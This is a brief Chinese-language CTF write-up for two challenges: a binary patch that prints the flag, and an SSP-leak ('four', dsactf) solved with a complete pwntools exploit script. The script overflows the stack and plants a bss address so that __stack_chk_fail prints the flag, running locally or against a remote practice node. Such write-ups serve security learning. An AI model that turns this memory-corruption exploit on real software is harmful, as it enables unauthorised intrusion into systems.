0x01 2048(jk出发)
修改跳转条件为nop,随便动一下直接打印flag。这个场景我幻想过很久了,一直没做到,这次参考wp做出来了知道怎么做了。学到!
0x02 four(dsactf)
vmmap查看段权限,可以看到bss段!以前完全不知道可以这样!!
ssp leak打法,没学过,这次学了。输入argv记一下,然后read开始的地址记一下,拿到偏移,可以打ssp leak,这是最关键的一点。不过高版本修复了。但是没关系,乐趣所在。
在__stack_chk_fail
中可以看到参数。
from pwn import *
p=process("./pwn")
if args.P:
p=remote('node4.buuoj.cn',25603)
context.terminal = ['tmux','splitw','-h']
if args.G:
gdb.attach(p)
p.sendlineafter('your choice :', b'2')
p.sendlineafter('You can give any value, trust me, there will be no overflow', str(0x5FF0-1))
payload = b'N'*(0x5de0) + b'flag\x00'
p.sendlineafter('Actually, this function doesn\'t seem to be useful', payload)
p.sendlineafter('Really?', b'y')
p.sendlineafter('your choice :', b'3')
p.sendlineafter('Enter level:', b'3')
p.sendlineafter('Enter mode:', b'3')
p.sendlineafter('Enter X:', b'3')
p.sendlineafter('Enter a string:', b'3')
p.sendlineafter('please input filename', b'output.txt')
p.sendlineafter('1. yes\n2.no', b'2')
bss = 0x602323
p.sendlineafter('your choice :', b'4')
payload = b':`##>@a*>~3'
p.sendlineafter('info>>', payload)
p.sendline(b'5')
#payload = b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaab' + p64(bss)
payload = b'YYYYYYYY' + b'N'*0x110+p64(bss)
p.send(payload)
拿到flag。